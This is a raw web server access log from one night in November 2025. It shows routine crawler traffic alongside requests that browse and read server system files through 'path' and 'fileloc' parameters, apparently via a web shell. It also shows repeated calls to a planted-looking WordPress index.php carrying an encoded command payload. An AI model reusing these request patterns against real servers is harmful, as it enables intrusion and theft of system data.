74.7.227.128 - - [06/Nov/2025:00:52:26 +0700] "GET /shopbrand1093690126?path=//etc/cl.php.d/alt-php74 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:52:29 +0700] "GET /shopbrand1093690126?path=//etc/cl.php.d/alt-php54 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:52:36 +0700] "GET /shopbrand1093690126?path=//var HTTP/2" 200 3202 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:52:40 +0700] "GET /shopbrand1093690126?fileloc=//etc/cl.php.d/alt-php44/alt_php.ini&path=//etc/cl.php.d/alt-php44 HTTP/2" 200 2486 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:50:43 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383634332p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336353034332q3935313265666230666634396665343037363432666237613266656165616239222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:52:46 +0700] "GET /shopbrand1093690126?path=//etc/cl.php.d/alt-php84 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:52:51 +0700] "GET /shopbrand1093571503?path=//bin HTTP/2" 200 16996 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:52:54 +0700] "GET /shopbrand1093690126?path=//bin HTTP/2" 200 18187 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:53:00 +0700] "GET /shopbrand1093571503?path=//tmp HTTP/2" 200 2825 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:53:04 +0700] "GET /shopbrand1093657736?path=//opt HTTP/2" 200 3173 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:51:05 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383636352p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336353036352q3537366231376134306163353231346363393338343564333033303935323937222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:53:10 +0700] "GET /shopbrand1093690126?path=//var/php HTTP/2" 200 2776 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.167.144.158 - - [06/Nov/2025:00:53:08 +0700] "GET /shopbrand936362236?kg=0934322690 HTTP/2" 200 25439 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
57.141.14.60 - - [06/Nov/2025:00:53:12 +0700] "GET /shopbrand1137199126?kg=1134722026 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.14.34 - - [06/Nov/2025:00:53:12 +0700] "GET /shopbrand1137401614?kg=1134924074 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.227.128 - - [06/Nov/2025:00:53:14 +0700] "GET /shopbrand1093571503?path=//usr HTTP/2" 200 3033 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:53:21 +0700] "GET /shopbrand1093571503?fileloc=//bin/gslp&path=//bin HTTP/2" 200 2697 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:53:25 +0700] "GET /shopbrand1093571503?fileloc=//bin/mknod&path=//bin HTTP/2" 200 31592 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:51:27 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383638372p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336353038372q3333383438343232323230323131366562336333303966373831623833666465222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:53:32 +0700] "GET /shopbrand1093690126?fileloc=//bin/logger&path=//bin HTTP/2" 200 13536 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.14.34 - - [06/Nov/2025:00:53:35 +0700] "GET /shopbrand1137385935?kg=1134908430 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.227.128 - - [06/Nov/2025:00:53:36 +0700] "GET /shopbrand1093571503?fileloc=//bin/ssh-agent&path=//bin HTTP/2" 200 2419 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:53:43 +0700] "GET /shopbrand1093571503?fileloc=//bin/pre-grohtml&path=//bin HTTP/2" 200 40968 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:53:47 +0700] "GET /shopbrand1093571503?fileloc=//bin/net-snmp-create-v3-user&path=//bin HTTP/2" 200 3623 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:51:50 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383731302p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336353131302q3534643866643965306264623464653462373438613138656539333930653430222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:53:52 +0700] "GET /shopbrand1093571503?fileloc=//bin/ipcs&path=//bin HTTP/2" 200 21242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:53:57 +0700] "GET /shopbrand1093571503?fileloc=//bin/pg_dumpall&path=//bin HTTP/2" 200 30296 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:54:03 +0700] "GET /shopbrand1093571503?fileloc=//bin/perlthanks&path=//bin HTTP/2" 200 19048 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:54:08 +0700] "GET /shopbrand1093690126?fileloc=//bin/od&path=//bin HTTP/2" 200 30330 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:52:12 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383733322p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336353133322q3736323534633165613461383632356134613531333062316265323565386638222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:54:13 +0700] "GET /shopbrand1093690126?fileloc=//bin/cp&path=//bin HTTP/2" 200 70108 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:54:18 +0700] "GET /shopbrand1093571503?fileloc=//bin/zcat&path=//bin HTTP/2" 200 3467 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:54:24 +0700] "GET /shopbrand1093690126?fileloc=//bin/gslj&path=//bin HTTP/2" 200 2699 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.167.144.220 - - [06/Nov/2025:00:54:24 +0700] "GET /shopbrand737135494?kg=0735529994 HTTP/2" 200 25605 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.128 - - [06/Nov/2025:00:54:28 +0700] "GET /shopbrand1093690126?path=//var/php/apm HTTP/2" 200 2787 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:54:35 +0700] "GET /shopbrand1093657736?path=//opt/rh HTTP/2" 200 2525 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:52:34 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383735342p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336353135342q3662643432333738663433393934633463393066306632653438313864643936222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:54:39 +0700] "GET /shopbrand1093571503?path=//run HTTP/2" 200 3222 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:54:45 +0700] "GET /shopbrand1093604023?path=//tmp HTTP/2" 200 2825 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:54:48 +0700] "GET /shopbrand1093571503?path=//var HTTP/2" 200 3202 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:54:55 +0700] "GET /shopbrand1093690126?path=//var/php/apm/db HTTP/2" 200 2539 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:52:56 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383737362p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336353137362q3832613632313436626262643835396336393539323331643635316162633162222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:54:58 +0700] "GET /shopbrand1093690126?fileloc=//bin/net-snmp-create-v3-user&path=//bin HTTP/2" 200 3623 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:55:04 +0700] "GET /shopbrand1093690126?path=//run HTTP/2" 200 3222 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.73.66 - - [06/Nov/2025:00:55:04 +0700] "GET /shopbrand33687789?kg=0033614854 HTTP/1.1" 200 24997 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.128 - - [06/Nov/2025:00:55:07 +0700] "GET /shopbrand1093571503?path=//run/sepermit HTTP/2" 200 2536 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:55:10 +0700] "GET /shopbrand1093690126?path=//tmp HTTP/2" 200 2825 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:55:16 +0700] "GET /shopbrand1093571503?path=//var/php HTTP/2" 200 2776 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:53:18 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383739382p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336353139382q6439623336323431666238653232346161613331323463396335376637356332222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:55:19 +0700] "GET /shopbrand1093690126?path=//sbin HTTP/2" 200 4000 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:55:25 +0700] "GET /shopbrand1093657736?path=//root HTTP/2" 200 2514 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:55:29 +0700] "GET /shopbrand1093690126?path=//run/console HTTP/2" 200 2532 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:55:32 +0700] "GET /shopbrand1093604023?path=//root HTTP/2" 200 2514 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:55:38 +0700] "GET /shopbrand1093571503?path=//sbin HTTP/2" 200 3958 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:53:40 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383832302p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336353232302q6634613561386231643139613339343536356366313637366338306466643162222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:55:41 +0700] "GET /shopbrand1093571503?path=//proc HTTP/2" 200 3408 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:55:47 +0700] "GET /shopbrand1093571503?path=//var/php/apm HTTP/2" 200 2787 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:55:50 +0700] "GET /shopbrand1093604023?path=//proc HTTP/2" 200 3411 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:55:56 +0700] "GET /shopbrand1093488824?path=//home3 HTTP/2" 200 2476 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:55:59 +0700] "GET /shopbrand1093488824?path=//home1 HTTP/2" 200 2526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.14.37 - - [06/Nov/2025:00:56:00 +0700] "GET /shopbrand1137505275?kg=1135027510 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
103.7.226.137 - - [06/Nov/2025:00:54:02 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383834322p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336353234322q3062623762323639356434343737376637646662383965393634343332336164222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
57.141.14.94 - - [06/Nov/2025:00:56:05 +0700] "GET /shopbrand1137403980?kg=1134926434 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.14.56 - - [06/Nov/2025:00:56:05 +0700] "GET /shopbrand1137215829?kg=1134738694 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.14.14 - - [06/Nov/2025:00:56:06 +0700] "GET /shopbrand1137391256?kg=1134913738 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.227.128 - - [06/Nov/2025:00:56:06 +0700] "GET /shopbrand1093488824?path=//home2 HTTP/2" 200 2526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:56:09 +0700] "GET /shopbrand1093690126?path=//home1 HTTP/2" 200 2526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:56:17 +0700] "GET /shopbrand1093571503?path=//var/php/apm/db HTTP/2" 200 2539 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:56:20 +0700] "GET /shopbrand1093571503?path=//home1 HTTP/2" 200 2526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:54:25 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383836352p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336353236352q6362363762313137343937316637386332643431326130623762613261343465222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:56:26 +0700] "GET /shopbrand1093571503?path=//home3 HTTP/2" 200 2526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:56:31 +0700] "GET /shopbrand1093533333?path=/home HTTP/2" 200 2769 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:56:34 +0700] "GET /shopbrand1093807707?path=/home/distri20/public_html/.tmb HTTP/2" 200 2806 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:56:39 +0700] "GET /shopbrand1093555954?path=//proc/net HTTP/2" 200 3029 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:56:46 +0700] "GET /shopbrand1093657736?path=//sbin HTTP/2" 200 4000 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:54:47 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383838372p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336353238372q6131626433383732666661646537666537363161643438653633323038383830222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:56:50 +0700] "GET /shopbrand1093690126?fileloc=//lib/systemd/systemd-user-sessions&path=//lib/systemd HTTP/2" 200 22578 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:56:56 +0700] "GET /shopbrand1093488824?path=//opt/rh HTTP/2" 200 2525 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:56:59 +0700] "GET /shopbrand1093555954?path=//opt/rh HTTP/2" 200 2525 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:57:06 +0700] "GET /shopbrand1093555954?fileloc=//proc/net/udp&path=//proc/net HTTP/2" 200 2716 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:55:09 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383930392p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336353330392q6262303830353537343162623164346362373435633733666130313864333962222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:57:09 +0700] "GET /shopbrand1093657736?fileloc=//sbin/faillock&path=//sbin HTTP/2" 200 7542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:57:12 +0700] "GET /shopbrand1093488824?path=//lib/jvm/jre-1.8.0-openjdk HTTP/2" 200 3023 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
